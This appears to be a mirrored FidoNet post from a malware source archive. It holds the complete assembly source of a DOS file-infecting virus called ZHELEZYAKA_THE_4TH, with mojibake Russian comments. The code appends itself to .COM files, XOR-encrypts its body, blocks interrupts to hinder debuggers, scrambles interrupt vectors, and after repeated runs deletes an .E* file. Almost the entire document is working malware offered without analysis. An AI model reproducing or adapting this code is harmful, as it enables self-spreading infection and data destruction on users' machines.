mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 08:15:27 +00:00
4b9382ddbc
push
370 lines
7.9 KiB
NASM
370 lines
7.9 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 1 of 64
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 08:59
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : ViRii
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : ABC.PVT.HACK (ABC: • æª...)
|
||
;* From : Alexei Galich, 123:1000/6.2 (31 Oct 94 13:44)
|
||
;* To : All
|
||
;* Subj : ViRii
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;<3B>p¨¢¥âáâ¢yî ‚ á, All
|
||
;
|
||
;‚®â ¢¨pyá ¯¨á «, áâp èë©, á ¬ ¯¨á « !
|
||
;H ¥§¤ë ¯p¨¨¬ îâáï á 1:00-8:00
|
||
;
|
||
;PS: Hy ¥ § î ï ¯®ç¥¬y ® â ¡y«îæ¨î ¥ ¯®ï«, ¨§¢¨¨â¥.
|
||
;
|
||
;--------8<-------------------------------------------------------
|
||
;
|
||
;
|
||
; ZHELEZYAKA_THE_4TH
|
||
|
||
IDEAL
|
||
MODEL TINY
|
||
CODESEG
|
||
ORG 100H
|
||
LOCALS
|
||
MAIN_BEGIN: JMP VIRUS_START_O
|
||
DB 04H,0,' ZHELEZYAKA_THE_4TH ',0
|
||
|
||
EXIT_ADDRESS EQU 100H
|
||
DOS EQU 21H
|
||
VIRUS_SIGNATURE EQU 04H
|
||
NUM_FIRST_BYTES EQU 4
|
||
ALREADY_INFECT EQU 3
|
||
COUNTER_ADDR EQU 510H
|
||
FALSE_BYTE_ADDR EQU 104H
|
||
COM_WILDCARD EQU (COM_WILDCARD_O-VIRUS_START_O)
|
||
EXE_WILDCARD EQU (EXE_WILDCARD_O-VIRUS_START_O)
|
||
|
||
WRITE_BUFFER EQU (WRITE_BUFFER_O-VIRUS_START_O)
|
||
ORIGIN_DIR EQU (WRITE_BUFFER+NUM_FIRST_BYTES)
|
||
NEW_DTA EQU (ORIGIN_DIR+65)
|
||
COPY_BUFFER EQU (NEW_DTA+256)
|
||
FALSE_BYTES EQU (COPY_BUFFER+WRITE_BUFFER)
|
||
|
||
ORIGIN_BEGIN EQU (ORIGIN_BEGIN_O-VIRUS_START_O)
|
||
MAIN_PART_LEN EQU (WRITE_BUFFER)
|
||
INFECTED_NUMB EQU (INFECTED_NUMB_O-VIRUS_START_O)
|
||
XOR_VALUE EQU (XOR_VALUE_O-VIRUS_START_O)
|
||
XOR_VAL0 EQU (XOR_VAL0_O-VIRUS_START_O)
|
||
XOR_VAL00 EQU (XOR_VAL00_O-VIRUS_START_O)
|
||
XOR_VAL1 EQU (XOR_VAL1_O-VIRUS_START_O)
|
||
XOR_VAL2 EQU (XOR_VAL2_O-VIRUS_START_O)
|
||
XOR_VAL3 EQU (XOR_VAL3_O-VIRUS_START_O)
|
||
XOR_VAL4 EQU (XOR_VAL4_O-VIRUS_START_O)
|
||
BEGIN_CODING EQU (BEGIN_CODING_O-VIRUS_START_O)
|
||
CONT_CODING EQU (CONT_CODING_O-VIRUS_START_O)
|
||
MESSAGE EQU (MESSAGE_O-VIRUS_START_O)
|
||
DOT EQU (DOT_O-VIRUS_START_O)
|
||
|
||
VIRUS_START_O: CALL DETECT_BEGIN_O
|
||
XOR_VAL0_O DB 0
|
||
DETECT_BEGIN_O: POP SI
|
||
SUB SI,3 ; SI - ç «® ¢¨àãá
|
||
JMP SHORT @@0
|
||
XOR_VAL00_O DB 0
|
||
@@0: LEA DI,[SI+BEGIN_CODING]
|
||
CALL CODE
|
||
BEGIN_CODING_O =$
|
||
|
||
MOV CX,NUM_FIRST_BYTES ; ‹¥ç¨¬
|
||
LEA DI,[SI+ORIGIN_BEGIN] ; ä ©«
|
||
MOV BX,100H ; ¢
|
||
MOVE_LOOP: MOV AH,[DI] ; ¯ ¬ïâ¨
|
||
MOV [BX],AH ;
|
||
INC DI ;
|
||
INC BX ;
|
||
LOOP MOVE_LOOP ;
|
||
|
||
LEA DX,[SI+NEW_DTA] ; ‘â ¢¨¬
|
||
MOV AH,1AH ; ᢮î
|
||
CALL CHECK ; DTA
|
||
|
||
MOV AH,47H ;
|
||
PUSH SI ; ‡ ¯®¬¨ ¥¬
|
||
LEA SI,[SI+ORIGIN_DIR+1] ; ⥪ã騩
|
||
CWD ; ª â «®£
|
||
CALL CHECK ;
|
||
POP SI ;
|
||
|
||
FIND_FIRST: LEA DX,[SI+COM_WILDCARD] ; <20>®¨áª ¯¥à¢®£®
|
||
XOR CX,CX ; COM ä ©«
|
||
MOV AH,4EH ;
|
||
FIND_NEXT: INT DOS ;
|
||
JNC @@L1 ;
|
||
JMP NO_FILES_FOUND ; …᫨ ¥â, â® ...
|
||
@@L1:
|
||
LEA DX,[SI+NEW_DTA+1EH] ; Žâªà®¥¬
|
||
MOV AX,3D02H ; íâ®â
|
||
CALL CHECK ; ä ©«
|
||
|
||
|
||
MOV BX,AX ; <20>à®ç¨â ¥¬
|
||
MOV AH,3FH ; ¯¥à¢ë¥ 4
|
||
LEA DX,[SI+ORIGIN_BEGIN] ; ¡ ©â
|
||
MOV DI,DX ; ¨§
|
||
MOV CX,NUM_FIRST_BYTES ; í⮣®
|
||
INT DOS ; ä ©«
|
||
ADD DI,NUM_FIRST_BYTES-1
|
||
|
||
CMP [BYTE PTR DI],VIRUS_SIGNATURE
|
||
JE @@L2
|
||
JMP INFECT_FILE
|
||
@@L2:
|
||
MOV AH,3EH ; ‡ ªà®¥¬
|
||
CALL CHECK ; ä ©«
|
||
|
||
CONT_SEARCHING: MOV AH,4FH ; ©â¨
|
||
JMP FIND_NEXT ; á«¥¤ãî騩 ä ©«
|
||
|
||
COM_WILDCARD_O DB '*.COM',0
|
||
EXE_WILDCARD_O DB '*.E*',0
|
||
|
||
MESSAGE_O DB 13,10,'ZHELEZYAKA_THE_4TH WITH YOU FOREVER',13,10,'$'
|
||
DOT_O DB '..',0
|
||
|
||
NO_FILES_FOUND: MOV AH,3BH ; ‘¬¥é ¥¬áï
|
||
LEA DX,[SI+DOT] ; ª â «®£
|
||
INT DOS ; ¢¢¥àå
|
||
JC @@L4 ; ¯®ª
|
||
JMP FIND_FIRST ; ¢®§¬®¦®
|
||
@@L4:
|
||
XOR AX,AX ;
|
||
MOV ES,AX ; “¢¥«¨ç¨¢ ¥¬
|
||
MOV DI,COUNTER_ADDR ; áç¥â稪
|
||
MOV AX,[ES:DI] ;
|
||
|
||
INC AL ;
|
||
MOV [ES:DI],AX ; —â®
|
||
CMP AL,ALREADY_INFECT ; ¡ã¤¥¬
|
||
JG INFECT_MORE ; ¤¥« âì?
|
||
CMP AH,ALREADY_INFECT-2 ;
|
||
JG BANNER ;
|
||
JMP EXECUTE_PROG ;
|
||
|
||
BANNER: XOR AX,AX ; ‘¡à®á áç¥â稪
|
||
MOV [ES:DI],AX
|
||
|
||
LEA DX,[SI+MESSAGE] ; ‚뢮¤
|
||
MOV AH,9 ; á®®¡é¥¨ï
|
||
CALL CHECK ;
|
||
|
||
MOV CX,5 ;
|
||
CONTINUE_NOISE: MOV DL,7 ; <20>¨áª
|
||
MOV AH,2 ;
|
||
INT DOS ;
|
||
LOOP CONTINUE_NOISE
|
||
JMP EXECUTE_PROG
|
||
|
||
INFECT_MORE: XOR AL,AL ; ‘â¨à ¨¥ ¯¥à¢®£® .E* ä ©«
|
||
INC AH
|
||
MOV [ES:DI],AX
|
||
|
||
LEA DI,[SI+ORIGIN_DIR] ;
|
||
MOV [BYTE PTR DI],'\' ; ‚®ááâ ¢«¨¢ ¥¬
|
||
MOV AH,3BH ; áâ àë©
|
||
XCHG DX,DI ; ª â «®£
|
||
INT DOS ;
|
||
|
||
LEA DX,[SI+EXE_WILDCARD]
|
||
XOR CX,CX
|
||
MOV AH,4EH
|
||
INT DOS
|
||
JC EXECUTE_PROG
|
||
|
||
LEA DX,[SI+NEW_DTA+1EH]
|
||
MOV AH,41H
|
||
INT 21H
|
||
|
||
EXECUTE_PROG: MOV DX,80H ; ‘â ¢¨¬
|
||
MOV AH,1AH ; áâ àãî
|
||
INT DOS ; DTA
|
||
|
||
LEA DI,[SI+ORIGIN_DIR] ;
|
||
MOV [BYTE PTR DI],'\' ; ‚®ááâ ¢«¨¢ ¥¬
|
||
MOV AH,3BH ; áâ àë©
|
||
XCHG DX,DI ; ª â «®£
|
||
INT DOS ;
|
||
|
||
MOV AX,DS
|
||
MOV ES,AX
|
||
MOV BP,100H ;
|
||
JMP BP ;
|
||
|
||
INFECT_FILE:
|
||
XOR AL,AL ;
|
||
MOV AH,[BYTE PTR SI+XOR_VALUE] ;
|
||
@@IFZERO: INC AH ;
|
||
JZ @@IFZERO ; <20>®¤£®â ¢«¨¢ ¥¬
|
||
MOV [BYTE PTR SI+XOR_VALUE],AH ; ®¢ë©
|
||
MOV [SI+XOR_VAL0],AH ; ª®¤
|
||
MOV [SI+XOR_VAL00],AH ;
|
||
MOV [SI+XOR_VAL1],AH ;
|
||
MOV [SI+XOR_VAL2],AH ;
|
||
MOV [SI+XOR_VAL3],AH ;
|
||
MOV [SI+XOR_VAL4],AH ;
|
||
|
||
MOV AX,5700H ; ‡ ¯®¬¨ ¥¬
|
||
CALL CHECK ; ¢à¥¬ï
|
||
PUSH CX ; ᮧ¤ ¨ï
|
||
PUSH DX ;
|
||
|
||
XOR CX,CX ; ˆ¤¥¬
|
||
XOR DX,DX ;
|
||
MOV AX,4202H ; ª®¥æ
|
||
CALL CHECK ; ä ©«
|
||
|
||
SUB AX,3 ; <20>®¤£®â ¢«¨¢ ¥¬
|
||
MOV [BYTE PTR SI+WRITE_BUFFER],0E9H ; ®¢ë¥
|
||
MOV [SI+WRITE_BUFFER+1],AX ; 4 ¡ ©â
|
||
MOV [BYTE PTR SI+WRITE_BUFFER+3],VIRUS_SIGNATURE
|
||
|
||
MOV CX,MAIN_PART_LEN ;
|
||
MOV DI,SI ; Š®¯¨à㥬
|
||
COPY_LOOP: MOV AH,[DI] ; ¢¨àãá
|
||
MOV [DI+COPY_BUFFER],AH ; ¢
|
||
INC DI ; ¡ãää¥à
|
||
LOOP COPY_LOOP ;
|
||
|
||
LEA DI,[SI+COPY_BUFFER+BEGIN_CODING] ; Š®¤¨à㥬
|
||
CALL CODER_DECODER ; ¥£®
|
||
|
||
LEA DI,[SI+COPY_BUFFER+CONT_CODING]
|
||
CALL FIRST_CODE
|
||
|
||
MOV CX,MAIN_PART_LEN ; <20>®¤¡¨à ¥¬
|
||
MOV AL,[BYTE PTR FALSE_BYTE_ADDR] ; ¤«¨ã
|
||
ADD AL,[FALSE_BYTES] ;
|
||
XOR AH,AH ;
|
||
ADD CX,AX ; <20>¨è¥¬
|
||
LEA DX,[SI+COPY_BUFFER] ; £« ¢ãî
|
||
MOV AH,40H ; ç áâì
|
||
INT DOS ; ¢¨àãá
|
||
|
||
|
||
XOR CX,CX ; ˆ¤¥¬
|
||
XOR DX,DX ;
|
||
MOV AX,4200H ; ç «®
|
||
CALL CHECK ; ä ©«
|
||
|
||
MOV CX,NUM_FIRST_BYTES ; ˆá¯à ¢«ï¥¬
|
||
LEA DX,[SI+WRITE_BUFFER] ; ¯¥à¢ë¥
|
||
MOV AH,40H ; ¡ ©âë
|
||
INT DOS ; ä ©«
|
||
|
||
POP DX ; ‚®ááâ ¢«¨¢ ¥¬
|
||
POP CX ; ¢à¥¬ï
|
||
MOV AX,5701H ; ᮧ¤ ¨ï
|
||
CALL CHECK ;
|
||
|
||
MOV AH,3EH ; ‡ ªàë¢ ¥¬
|
||
INT DOS ; ä ©«
|
||
|
||
CALL CODE_INT
|
||
|
||
JMP EXECUTE_PROG
|
||
|
||
ORIGIN_BEGIN_O DB 0CDH,20H,90H,90H
|
||
|
||
CONT_CODING_O =$
|
||
|
||
CODER_DECODER: MOV CX,CODER_DECODER-BEGIN_CODING_O-1
|
||
MOV AH,[SI+XOR_VALUE]
|
||
XOR AL,AL
|
||
OUT 21H,AL
|
||
CODING_LOOP: IN AL,21H
|
||
ADD AL,AH
|
||
XOR [DI],AL ; ‘ ¬
|
||
INC DI ; ª®¤¨à®¢é¨ª
|
||
ADD AL,[FALSE_BYTE_ADDR]
|
||
OUT 21H,AL ;
|
||
LOOP CODING_LOOP ;
|
||
XOR AL,AL
|
||
OUT 21H,AL
|
||
RET
|
||
|
||
CHECK: PUSH AX ; <20>«®ª¨à®¢ª ¯à¥àë¢ ¨ï
|
||
PUSHF
|
||
MOV AL,0FEH
|
||
OUT 21H,AL
|
||
MOV AH,4FH
|
||
POPF
|
||
POP AX
|
||
INT 21H
|
||
PUSH AX
|
||
PUSHF
|
||
IN AL,21H
|
||
CMP AL,0FEH
|
||
@@HALT: JNE @@HALT
|
||
XOR AL,AL
|
||
OUT 21H,AL
|
||
POPF
|
||
POP AX
|
||
RET
|
||
|
||
CODE_INT: XOR AX,AX ; Š®¤¨à®¢ ¨¥ INT 0 - 3
|
||
MOV ES,AX
|
||
MOV CX,12
|
||
COD_INT_CON: MOV BX,CX
|
||
XOR [BYTE PTR ES:BX],10101010B
|
||
LOOP COD_INT_CON
|
||
PUSH CS
|
||
POP ES
|
||
RET
|
||
; ------------
|
||
FIRST_CODE: MOV CX,FIRST_CODE-CODER_DECODER ; <20>।¢ à¨â¥«ìë©
|
||
MOV AH,[SI+XOR_VALUE] ; ª®¤¨à®¢é¨ª
|
||
JMP SHORT FIRST_COD_LOOP
|
||
XOR_VAL1_O DB 0
|
||
FIRST_COD_LOOP: XOR [DI],AH
|
||
INC DI
|
||
JMP SHORT @@2
|
||
XOR_VAL2_O DB 0
|
||
@@2: LOOP FIRST_COD_LOOP
|
||
RET
|
||
|
||
XOR_VALUE_O DB 0
|
||
|
||
CODE: PUSH DI
|
||
LEA DI,[SI+CONT_CODING]
|
||
JMP @@3
|
||
XOR_VAL3_O DB 0
|
||
@@3: CALL FIRST_CODE
|
||
MOV AH,40H
|
||
JMP @@4
|
||
XOR_VAL4_O DB 0
|
||
@@4: CALL CHECK ; —â®¡ë ®¡¬ ãâì ¯¥à¥å¢ â稪
|
||
CALL CODE_INT
|
||
POP DI
|
||
JMP SHORT CODER_DECODER
|
||
|
||
WRITE_BUFFER_O =$
|
||
END MAIN_BEGIN
|
||
|
||
;---------------8<-------------------------------------------------
|
||
;
|
||
;- ‚ᥠíâ® ¡ë«® ¡ë ¯p¨ª®«ì®, ª®£¤ ¡ë ¥ ¡ë«® â ª ¡®«ì®.
|
||
;
|
||
; -= iR0NMAN =-
|
||
;
|
||
;-+- GoldED 2.50.B1016+
|
||
; + Origin: Œ…H’Ž‚Š€ - <20>’Ž <20><>€‡„HˆŠ !!! (123:1000/6.2)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/p Check for code segment overrides in protected mode
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|